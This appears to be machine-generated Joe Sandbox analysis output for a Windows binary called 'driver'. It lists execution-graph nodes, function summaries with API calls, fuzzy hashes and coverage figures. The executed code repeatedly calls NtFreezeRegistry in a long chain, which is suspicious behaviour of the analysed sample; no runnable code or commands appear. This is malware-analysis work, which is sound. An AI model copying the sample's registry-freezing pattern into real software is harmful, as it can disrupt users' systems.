7ff7f4f21394 2 API calls 4919->4921 4920->4919 4922 7ff7f4f21468 4921->4922 4923 7ff7f4f2146d 4922->4923 4924 7ff7f4f21394 2 API calls 4922->4924 4925 7ff7f4f21394 2 API calls 4923->4925 4924->4923 4926 7ff7f4f21477 4925->4926 4927 7ff7f4f2147c 4926->4927 4928 7ff7f4f21394 2 API calls 4926->4928 4929 7ff7f4f21394 2 API calls 4927->4929 4928->4927 4930 7ff7f4f21486 4929->4930 4931 7ff7f4f2148b 4930->4931 4932 7ff7f4f21394 2 API calls 4930->4932 4933 7ff7f4f21394 2 API calls 4931->4933 4932->4931 4934 7ff7f4f21495 4933->4934 4935 7ff7f4f2149a 4934->4935 4936 7ff7f4f21394 2 API calls 4934->4936 4937 7ff7f4f21394 2 API calls 4935->4937 4936->4935 4938 7ff7f4f214a4 4937->4938 4939 7ff7f4f214a9 4938->4939 4940 7ff7f4f21394 2 API calls 4938->4940 4941 7ff7f4f21394 2 API calls 4939->4941 4940->4939 4942 7ff7f4f214b3 4941->4942 4943 7ff7f4f214b8 4942->4943 4944 7ff7f4f21394 2 API calls 4942->4944 4945 7ff7f4f21394 2 API calls 4943->4945 4944->4943 4946 7ff7f4f214c2 4945->4946 4947 7ff7f4f214c7 4946->4947 4948 7ff7f4f21394 2 API calls 4946->4948 4949 7ff7f4f21394 2 API calls 4947->4949 4948->4947 4950 7ff7f4f214d1 4949->4950 4951 7ff7f4f214d6 4950->4951 4952 7ff7f4f21394 2 API calls 4950->4952 4953 7ff7f4f21394 2 API calls 4951->4953 4952->4951 4954 7ff7f4f214e0 4953->4954 4955 7ff7f4f214e5 4954->4955 4956 7ff7f4f21394 2 API calls 4954->4956 4957 7ff7f4f21394 2 API calls 4955->4957 4956->4955 4958 7ff7f4f214ef 4957->4958 4959 7ff7f4f214f4 4958->4959 4960 7ff7f4f21394 2 API calls 4958->4960 4961 7ff7f4f21394 2 API calls 4959->4961 4960->4959 4962 7ff7f4f214fe 4961->4962 4963 7ff7f4f21394 2 API calls 4962->4963 4964 7ff7f4f21503 4963->4964 4965 7ff7f4f21394 2 API calls 4964->4965 4966 7ff7f4f21512 4965->4966 4967 7ff7f4f21394 2 API calls 4966->4967 4968 7ff7f4f21521 4967->4968 4969 7ff7f4f21530 4968->4969 4970 7ff7f4f21394 2 API calls 4968->4970 4971 7ff7f4f21394 2 API calls 4969->4971 4970->4969 4972 7ff7f4f2153a 4971->4972 4973 7ff7f4f2153f 4972->4973 4974 7ff7f4f21394 2 API calls 4972->4974 4975 7ff7f4f21394 2 API calls 4973->4975 4974->4973 4976 7ff7f4f2154e 4975->4976 4977 7ff7f4f21394 2 API calls 4976->4977 4978 7ff7f4f21558 4977->4978 4979 7ff7f4f2155d 4978->4979 4980 7ff7f4f21394 2 API calls 4978->4980 4981 7ff7f4f21394 2 API calls 4979->4981 4980->4979 4982 7ff7f4f21567 4981->4982 4983 7ff7f4f2156c 4982->4983 4984 7ff7f4f21394 2 API calls 4982->4984 4985 7ff7f4f21394 2 API calls 4983->4985 4984->4983 4986 7ff7f4f21576 4985->4986 4987 7ff7f4f2157b 4986->4987 4988 7ff7f4f21394 2 API calls 4986->4988 4989 7ff7f4f21394 2 API calls 4987->4989 4988->4987 4990 7ff7f4f21585 4989->4990 4991 7ff7f4f2158a 4990->4991 4992 7ff7f4f21394 2 API calls 4990->4992 4993 7ff7f4f21394 2 API calls 4991->4993 4992->4991 4994 7ff7f4f21599 4993->4994 4995 7ff7f4f21394 2 API calls 4994->4995 4996 7ff7f4f215a3 4995->4996 4997 7ff7f4f215a8 4996->4997 4998 7ff7f4f21394 2 API calls 4996->4998 4999 7ff7f4f21394 2 API calls 4997->4999 4998->4997 5000 7ff7f4f215b7 4999->5000 5001 7ff7f4f21394 2 API calls 5000->5001 5002 7ff7f4f215c1 5001->5002 5003 7ff7f4f215c6 5002->5003 5004 7ff7f4f21394 2 API calls 5002->5004 5005 7ff7f4f21394 2 API calls 5003->5005 5004->5003 5006 7ff7f4f215d0 5005->5006 5007 7ff7f4f215d5 5006->5007 5008 7ff7f4f21394 2 API calls 5006->5008 5009 7ff7f4f21394 2 API calls 5007->5009 5008->5007 5010 7ff7f4f215df 5009->5010 5011 7ff7f4f215e4 5010->5011 5012 7ff7f4f21394 2 API calls 5010->5012 5013 7ff7f4f21394 2 API calls 5011->5013 5012->5011 5014 7ff7f4f215f3 5013->5014 5014->4218 5025 7ff7f4f22320 strlen 5026 7ff7f4f22337 5025->5026 5090 7ff7f4f21000 5091 7ff7f4f2108b __set_app_type 5090->5091 5092 7ff7f4f21040 5090->5092 5093 7ff7f4f210b6 5091->5093 5092->5091 5094 7ff7f4f210e5 5093->5094 5096 7ff7f4f21e00 5093->5096 5097 7ff7f4f287d0 __setusermatherr 5096->5097 5098 7ff7f4f21800 5099 7ff7f4f21812 5098->5099 5100 7ff7f4f21835 fprintf 5099->5100 5101 7ff7f4f22104 5102 7ff7f4f22218 5101->5102 5103 7ff7f4f22111 EnterCriticalSection 5101->5103 5104 7ff7f4f22272 5102->5104 5107 7ff7f4f22241 DeleteCriticalSection 5102->5107 5109 7ff7f4f22230 free 5102->5109 5105 7ff7f4f2220b LeaveCriticalSection 5103->5105 5106 7ff7f4f2212e 5103->5106 5105->5102 5106->5105 5108 7ff7f4f2214d TlsGetValue GetLastError 5106->5108 5107->5104 5108->5106 5109->5107 5109->5109 5035 7ff7f4f21ac3 5036 7ff7f4f21a70 5035->5036 5037 7ff7f4f21b36 5036->5037 5038 7ff7f4f2199e 5036->5038 5041 7ff7f4f21b53 5036->5041 5040 7ff7f4f21ba0 4 API calls 5037->5040 5039 7ff7f4f21a0f 5038->5039 5042 7ff7f4f219e9 VirtualProtect 5038->5042 5040->5041 5042->5038 5074 7ff7f4f21e65 5075 7ff7f4f21e67 signal 5074->5075 5076 7ff7f4f21e7c 5075->5076 5078 7ff7f4f21e99 5075->5078 5077 7ff7f4f21e82 signal 5076->5077 5076->5078 5077->5078 5048 7ff7f4f22050 5049 7ff7f4f2205e EnterCriticalSection 5048->5049 5050 7ff7f4f220cf 5048->5050 5051 7ff7f4f220c2 LeaveCriticalSection 5049->5051 5052 7ff7f4f22079 5049->5052 5051->5050 5052->5051 5053 7ff7f4f220bd free 5052->5053 5053->5051 5054 7ff7f4f21fd0 5055 7ff7f4f21fe4 5054->5055 5057 7ff7f4f22033 5054->5057 5056 7ff7f4f21ffd EnterCriticalSection LeaveCriticalSection 5055->5056 5055->5057 5056->5057 5079 7ff7f4f21a70 5080 7ff7f4f2199e 5079->5080 5084 7ff7f4f21a7d 5079->5084 5081 7ff7f4f21a0f 5080->5081 5082 7ff7f4f219e9 VirtualProtect 5080->5082 5082->5080 5083 7ff7f4f21b53 5084->5079 5084->5083 5085 7ff7f4f21b36 5084->5085 5086 7ff7f4f21ba0 4 API calls 5085->5086 5086->5083 5110 7ff7f4f21e10 5111 7ff7f4f21e2f 5110->5111 5112 7ff7f4f21ecc 5111->5112 5116 7ff7f4f21eb5 5111->5116 5117 7ff7f4f21e55 5111->5117 5113 7ff7f4f21ed3 signal 5112->5113 5112->5116 5114 7ff7f4f21ee4 5113->5114 5113->5116 5115 7ff7f4f21eea signal 5114->5115 5114->5116 5115->5116 5117->5116 5118 7ff7f4f21f12 signal 5117->5118 5118->5116 5087 7ff7f4f2216f 5088 7ff7f4f22178 InitializeCriticalSection 5087->5088 5089 7ff7f4f22185 5087->5089 5088->5089 5015 7ff7f4f21394 5016 7ff7f4f28240 malloc 5015->5016 5017 7ff7f4f213b8 5016->5017 5018 7ff7f4f213c6 NtFreezeRegistry 5017->5018 5027 7ff7f4f21ab3 5028 7ff7f4f21a70 5027->5028 5028->5027 5029 7ff7f4f21b36 5028->5029 5032 7ff7f4f2199e 5028->5032 5033 7ff7f4f21b53 5028->5033 5031 7ff7f4f21ba0 4 API calls 5029->5031 5030 7ff7f4f21a0f 5031->5033 5032->5030 5034 7ff7f4f219e9 VirtualProtect 5032->5034 5034->5032

                                                                                Executed Functions

                                                                                Function 00007FF7F4F21160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction ID: 0940f743ff760b1bb607b794f00ef9de5d21ddc33677be78854bdfd950cc2887
                                                                                • Opcode Fuzzy Hash: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction Fuzzy Hash: FE516231E1964A82F710BF27E980779A7E4BF447A0F885531C92D833E5DE3CB64183A4
                                                                                Function 00007FF7F4F21394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtFreezeRegistry.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F4F21156), ref: 00007FF7F4F213F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: FreezeRegistry
                                                                                • String ID:
                                                                                • API String ID: 2239323298-0
                                                                                • Opcode ID: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction ID: 2a6b2aafb3d05e6af68d6e8683afda983965c9b83f02ff5e346196232d7e71d7
                                                                                • Opcode Fuzzy Hash: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction Fuzzy Hash: 2EF0C971918B4183D715EF52F88042AB7A0FB98390B844939E9AC437A9DF3CE2508BA0

                                                                                Non-executed Functions

                                                                                Function 00007FF7F4F23350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 4263182637-1413854666
                                                                                • Opcode ID: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction ID: 3197eceb88783a1d9f0bc89fb03e6c87b0e2b06af446ca9b20914f4f4f4e45ce
                                                                                • Opcode Fuzzy Hash: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction Fuzzy Hash: 7AB1B66191CAC286E321AF25F8853AAF7A0FF91758F840235D99C426D9DF7CE246C790
                                                                                Function 00007FF7F4F22690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 329590056-2527496196
                                                                                • Opcode ID: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction ID: f44214b8ddcc9b5ac3852f8293fffeceee7cfbc0b750423b73b3e48409dce34e
                                                                                • Opcode Fuzzy Hash: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction Fuzzy Hash: 4F029522918BC182E7209F15F8443AAB7A0FB85BA4F844735DAAC477E5DF7CE185C790
                                                                                Function 00007FF7F4F21BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21CC7
                                                                                • memcpy.MSVCRT ref: 00007FF7F4F21CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction ID: e9cb6ede685aab8f89b168d04e934e1b4a980d6fc3f072786e7583b2f47d31d4
                                                                                • Opcode Fuzzy Hash: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction Fuzzy Hash: FE419365E0854683EB10AF47D5846B9A7E0EB44BE4FD84531CE2D833E1DE3CE646C3A4
                                                                                Function 00007FF7F4F22104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction ID: f1d275591d7f2a7b31807b4cfb00d899e5c4fcc15df66cb4f7705ed59837bbc8
                                                                                • Opcode Fuzzy Hash: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction Fuzzy Hash: D021F121E4950683F715BF06E98027492A0BF51BA4FC90930C93D976E8DF2DBA4283A0
                                                                                Function 00007FF7F4F21E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 652 7ff7f4f21e10-7ff7f4f21e2d 653 7ff7f4f21e3e-7ff7f4f21e48 652->653 654 7ff7f4f21e2f-7ff7f4f21e38 652->654 656 7ff7f4f21e4a-7ff7f4f21e53 653->656 657 7ff7f4f21ea3-7ff7f4f21ea8 653->657 654->653 655 7ff7f4f21f60-7ff7f4f21f69 654->655 658 7ff7f4f21ecc-7ff7f4f21ed1 656->658 659 7ff7f4f21e55-7ff7f4f21e60 656->659 657->655 660 7ff7f4f21eae-7ff7f4f21eb3 657->660 661 7ff7f4f21f23-7ff7f4f21f2d 658->661 662 7ff7f4f21ed3-7ff7f4f21ee2 signal 658->662 659->657 663 7ff7f4f21efb-7ff7f4f21f0a call 7ff7f4f287e0 660->663 664 7ff7f4f21eb5-7ff7f4f21eba 660->664 666 7ff7f4f21f2f-7ff7f4f21f3f 661->666 667 7ff7f4f21f43-7ff7f4f21f45 661->667 662->661 665 7ff7f4f21ee4-7ff7f4f21ee8 662->665 663->661 674 7ff7f4f21f0c-7ff7f4f21f10 663->674 664->655 669 7ff7f4f21ec0 664->669 670 7ff7f4f21eea-7ff7f4f21ef9 signal 665->670 671 7ff7f4f21f4e-7ff7f4f21f53 665->671 673 7ff7f4f21f5a 666->673 667->655 669->661 670->655 671->673 673->655 675 7ff7f4f21f12-7ff7f4f21f21 signal 674->675 676 7ff7f4f21f55 674->676 675->655 675->661 676->673
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction ID: b190482f421f4aaec18e6122bc61f113ae1c4e6e825df93530988ca6efa07d0b
                                                                                • Opcode Fuzzy Hash: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction Fuzzy Hash: D0217121E0950643FB757A17DAC037991C1AF847B4FAC8631DE3D872D4DE2CAA8182E8
                                                                                Function 00007FF7F4F21880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 677 7ff7f4f21880-7ff7f4f2189c 678 7ff7f4f21a0f-7ff7f4f21a1f 677->678 679 7ff7f4f218a2-7ff7f4f218f9 call 7ff7f4f22420 call 7ff7f4f22660 677->679 679->678 684 7ff7f4f218ff-7ff7f4f21910 679->684 685 7ff7f4f2193e-7ff7f4f21941 684->685 686 7ff7f4f21912-7ff7f4f2191c 684->686 688 7ff7f4f2194d-7ff7f4f21954 685->688 689 7ff7f4f21943-7ff7f4f21947 685->689 687 7ff7f4f2191e-7ff7f4f21929 686->687 686->688 687->688 690 7ff7f4f2192b-7ff7f4f2193a 687->690 692 7ff7f4f2199e-7ff7f4f219a6 688->692 693 7ff7f4f21956-7ff7f4f21961 688->693 689->688 691 7ff7f4f21a20-7ff7f4f21a26 689->691 690->685 694 7ff7f4f21b87-7ff7f4f21b98 call 7ff7f4f21d40 691->694 695 7ff7f4f21a2c-7ff7f4f21a37 691->695 692->678 696 7ff7f4f219a8-7ff7f4f219c1 692->696 697 7ff7f4f21970-7ff7f4f2199c call 7ff7f4f21ba0 693->697 695->692 698 7ff7f4f21a3d-7ff7f4f21a5f 695->698 699 7ff7f4f219df-7ff7f4f219e7 696->699 697->692 702 7ff7f4f21a7d-7ff7f4f21a97 698->702 703 7ff7f4f219e9-7ff7f4f21a0d VirtualProtect 699->703 704 7ff7f4f219d0-7ff7f4f219dd 699->704 707 7ff7f4f21a9d-7ff7f4f21afa 702->707 708 7ff7f4f21b74-7ff7f4f21b82 call 7ff7f4f21d40 702->708 703->704 704->678 704->699 714 7ff7f4f21afc-7ff7f4f21b0e 707->714 715 7ff7f4f21b22-7ff7f4f21b26 707->715 708->694 716 7ff7f4f21b5c-7ff7f4f21b6c 714->716 717 7ff7f4f21b10-7ff7f4f21b20 714->717 718 7ff7f4f21b2c-7ff7f4f21b30 715->718 719 7ff7f4f21a70-7ff7f4f21a77 715->719 716->708 720 7ff7f4f21b6f call 7ff7f4f21d40 716->720 717->715 717->716 718->719 721 7ff7f4f21b36-7ff7f4f21b53 call 7ff7f4f21ba0 718->721 719->692 719->702 720->708 721->716
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F4F21247), ref: 00007FF7F4F219F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction ID: b5792ebfb7cfdd9c14ff38ac9962e7a1277aceab65d1ba1bf067b3e9f27e124a
                                                                                • Opcode Fuzzy Hash: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction Fuzzy Hash: F1517321F04556D7EB10AF26D9807B5B7A1BB04BA4F884531D92C477E8CF3CE686C764
                                                                                Function 00007FF7F4F21800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 724 7ff7f4f21800-7ff7f4f21810 725 7ff7f4f21812-7ff7f4f21822 724->725 726 7ff7f4f21824 724->726 727 7ff7f4f2182b-7ff7f4f21867 call 7ff7f4f22290 fprintf 725->727 726->727
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction ID: aa942754d01d90b211afdf6a59a1d4fbc5bcf97fba87f33a1224a04b7ba292aa
                                                                                • Opcode Fuzzy Hash: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction Fuzzy Hash: 73F0C811E1898583E711BF26E9810BDE3A1EB493E0F949231DE5DA32D1DF1CE2418350
                                                                                Function 00007FF7F4F2219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction ID: ca75ff9f811bda27e18eaa4e67340965efadba597e2f66f84bd636409870b8d5
                                                                                • Opcode Fuzzy Hash: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction Fuzzy Hash: 8B011E25E0960683F715BF56ED8027492A0BF04FA0FC90431CE2D536D4DF2CBA9282A0

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:131
                                                                                Total number of Limit Nodes:10
